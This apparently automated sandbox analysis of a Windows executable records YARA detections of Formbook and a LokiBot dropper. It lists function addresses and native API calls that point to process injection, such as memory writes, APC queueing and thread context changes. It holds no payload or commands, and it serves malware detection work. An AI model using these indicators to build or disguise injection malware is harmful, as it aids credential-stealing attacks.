Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_00401772 2_2_00401772
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_00401725 2_2_00401725
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_00401536 2_2_00401536
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02322AD2 2_2_02322AD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02312386 2_2_02312386
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231C88B 2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023206A2 2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231523E 2_2_0231523E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0232322B 2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02315814 2_2_02315814
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02311069 2_2_02311069
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02321161 2_2_02321161
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231CE0C 2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02320754 2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231FFED 2_2_0231FFED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023104A3 2_2_023104A3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02321490 2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231A574 2_2_0231A574
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E980EAD 10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E989ED2 10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2EE8 10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E912E48 10_2_1E912E48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F0E50 10_2_1E8F0E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98EFBF 10_2_1E98EFBF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E981FC6 10_2_1E981FC6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DCF00 10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98FF63 10_2_1E98FF63
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E969C98 10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8CDF 10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFCE0 10_2_1E8EFCE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E99ACEB 10_2_1E99ACEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E957CE8 10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0C12 10_2_1E8C0C12
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DAC20 10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97EC4C 10_2_1E97EC4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3C60 10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E986C69 10_2_1E986C69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98EC60 10_2_1E98EC60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E2DB0 10_2_1E8E2DB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D9DD0 10_2_1E8D9DD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96FDF4 10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CAD00 10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98FD27 10_2_1E98FD27
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E987D4C 10_2_1E987D4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0D69 10_2_1E8D0D69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98FA89 10_2_1E98FA89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFAA0 10_2_1E8EFAA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98CA13 10_2_1E98CA13
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98EA5B 10_2_1E98EA5B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944BC0 10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E90DB19 10_2_1E90DB19
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0B10 10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98FB2E 10_2_1E98FB2E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E6882 10_2_1E8E6882
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9498B2 10_2_1E9498B2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9818DA 10_2_1E9818DA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D28C0 10_2_1E8D28C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9878F3 10_2_1E9878F3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3800 10_2_1E8D3800
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FE810 10_2_1E8FE810
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970835 10_2_1E970835
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B6868 10_2_1E8B6868
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E945870 10_2_1E945870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98F872 10_2_1E98F872
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D9870 10_2_1E8D9870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EB870 10_2_1E8EB870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CE9A0 10_2_1E8CE9A0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98E9A6 10_2_1E98E9A6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9159C0 10_2_1E9159C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0680 10_2_1E8D0680
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98A6C0 10_2_1E98A6C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8CC6E0 10_2_1E8CC6E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98F6F6 10_2_1E98F6F6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9436EC 10_2_1E9436EC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EC600 10_2_1E8EC600
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96D62C 10_2_1E96D62C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97D646 10_2_1E97D646
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F4670 10_2_1E8F4670
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E986757 10_2_1E986757
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D2760 10_2_1E8D2760
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DA760 10_2_1E8DA760
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93D480 10_2_1E93D480
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0445 10_2_1E8D0445
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98F5C9 10_2_1E98F5C9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9875C6 10_2_1E9875C6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E99A526 10_2_1E99A526
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BD2EC 10_2_1E8BD2EC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98124C 10_2_1E98124C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1380 10_2_1E8C1380
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DE310 10_2_1E8DE310
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98F330 10_2_1E98F330
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E90508C 10_2_1E90508C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C00A0 10_2_1E8C00A0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8DB0D0 10_2_1E8DB0D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9870F1 10_2_1E9870F1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97E076 10_2_1E97E076
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D51C0 10_2_1E8D51C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EB1E0 10_2_1E8EB1E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E99010E 10_2_1E99010E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BF113 10_2_1E8BF113
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E96D130 10_2_1E96D130
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E91717A 10_2_1E91717A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04370445 15_2_04370445
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043DD480 15_2_043DD480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0443A526 15_2_0443A526
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_044275C6 15_2_044275C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442F5C9 15_2_0442F5C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0441D646 15_2_0441D646
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0438C600 15_2_0438C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04394670 15_2_04394670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0440D62C 15_2_0440D62C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442A6C0 15_2_0442A6C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442F6F6 15_2_0442F6F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04370680 15_2_04370680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043E36EC 15_2_043E36EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0436C6E0 15_2_0436C6E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04426757 15_2_04426757
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04372760 15_2_04372760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0437A760 15_2_0437A760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0441E076 15_2_0441E076
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043600A0 15_2_043600A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_044270F1 15_2_044270F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A508C 15_2_043A508C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0437B0D0 15_2_0437B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0435F113 15_2_0435F113
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043B717A 15_2_043B717A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0443010E 15_2_0443010E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0440D130 15_2_0440D130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0438B1E0 15_2_0438B1E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043751C0 15_2_043751C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442124C 15_2_0442124C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0435D2EC 15_2_0435D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0437E310 15_2_0437E310
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442F330 15_2_0442F330
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04361380 15_2_04361380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0441EC4C 15_2_0441EC4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0437AC20 15_2_0437AC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442EC60 15_2_0442EC60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04360C12 15_2_04360C12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04426C69 15_2_04426C69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04373C60 15_2_04373C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0443ACEB 15_2_0443ACEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043F7CE8 15_2_043F7CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0438FCE0 15_2_0438FCE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04409C98 15_2_04409C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04388CDF 15_2_04388CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04427D4C 15_2_04427D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0436AD00 15_2_0436AD00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04370D69 15_2_04370D69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442FD27 15_2_0442FD27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04382DB0 15_2_04382DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0440FDF4 15_2_0440FDF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04379DD0 15_2_04379DD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04410E6D 15_2_04410E6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04390E50 15_2_04390E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043B2E48 15_2_043B2E48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04371EB2 15_2_04371EB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04429ED2 15_2_04429ED2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04362EE8 15_2_04362EE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04420EAD 15_2_04420EAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442FF63 15_2_0442FF63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0437CF00 15_2_0437CF00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04421FC6 15_2_04421FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04376FE0 15_2_04376FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442EFBF 15_2_0442EFBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0439E810 15_2_0439E810
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0442F872 15_2_0442F872
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: String function: 1E8BB910 appears 268 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: String function: 1E94EF10 appears 105 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: String function: 1E917BE4 appears 96 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: String function: 1E93E692 appears 86 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E8F5050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1EA6E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E8BB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E93E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1EA7EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E94EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E8AB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E917BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1EA35050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E92E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E93EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E9EB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: String function: 1E907BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 043EEF10 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 043B7BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 043A5050 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 043DE692 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0435B910 appears 268 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023223E2 NtProtectVirtualMemory, 2_2_023223E2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231C88B NtAllocateVirtualMemory,LoadLibraryA, 2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023206A2 NtWriteVirtualMemory,LoadLibraryA, 2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0232322B NtWriteVirtualMemory, 2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231CE0C NtWriteVirtualMemory,LoadLibraryA, 2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02320754 NtWriteVirtualMemory,LoadLibraryA, 2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_1E902EB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902ED0 NtResumeThread,LdrInitializeThunk, 10_2_1E902ED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902E50 NtCreateSection,LdrInitializeThunk, 10_2_1E902E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902F00 NtCreateFile,LdrInitializeThunk, 10_2_1E902F00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902CF0 NtDelayExecution,LdrInitializeThunk, 10_2_1E902CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902C30 NtMapViewOfSection,LdrInitializeThunk, 10_2_1E902C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902C50 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_1E902C50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902DA0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_1E902DA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_1E902DC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk, 10_2_1E902D10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_1E902B90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902BC0 NtQueryInformationToken,LdrInitializeThunk, 10_2_1E902BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_1E902B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9029F0 NtReadFile,LdrInitializeThunk, 10_2_1E9029F0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9034E0 NtCreateMutant,LdrInitializeThunk, 10_2_1E9034E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902E80 NtCreateProcessEx, 10_2_1E902E80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902EC0 NtQuerySection, 10_2_1E902EC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902E00 NtQueueApcThread, 10_2_1E902E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902FB0 NtSetValueKey, 10_2_1E902FB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902F30 NtOpenDirectoryObject, 10_2_1E902F30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E903C90 NtOpenThread, 10_2_1E903C90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902CD0 NtEnumerateKey, 10_2_1E902CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902C10 NtOpenProcess, 10_2_1E902C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E903C30 NtOpenProcessToken, 10_2_1E903C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902C20 NtSetInformationFile, 10_2_1E902C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902D50 NtWriteVirtualMemory, 10_2_1E902D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902A80 NtClose, 10_2_1E902A80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902AA0 NtQueryInformationFile, 10_2_1E902AA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902AC0 NtEnumerateValueKey, 10_2_1E902AC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902A10 NtWriteFile, 10_2_1E902A10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902B80 NtCreateKey, 10_2_1E902B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902BE0 NtQueryVirtualMemory, 10_2_1E902BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902B00 NtQueryValueKey, 10_2_1E902B00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902B20 NtQueryInformationProcess, 10_2_1E902B20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9038D0 NtGetContextThread, 10_2_1E9038D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E9029D0 NtWaitForSingleObject, 10_2_1E9029D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E904570 NtSuspendThread, 10_2_1E904570
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E904260 NtSetContextThread, 10_2_1E904260
